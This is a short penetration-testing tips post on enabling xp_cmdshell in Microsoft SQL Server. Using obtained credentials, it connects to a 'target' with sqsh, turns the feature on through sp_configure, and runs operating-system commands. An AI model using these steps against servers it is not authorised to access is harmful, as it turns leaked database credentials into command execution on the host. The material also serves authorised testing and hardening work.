Tips & Tricks

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target w/ the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'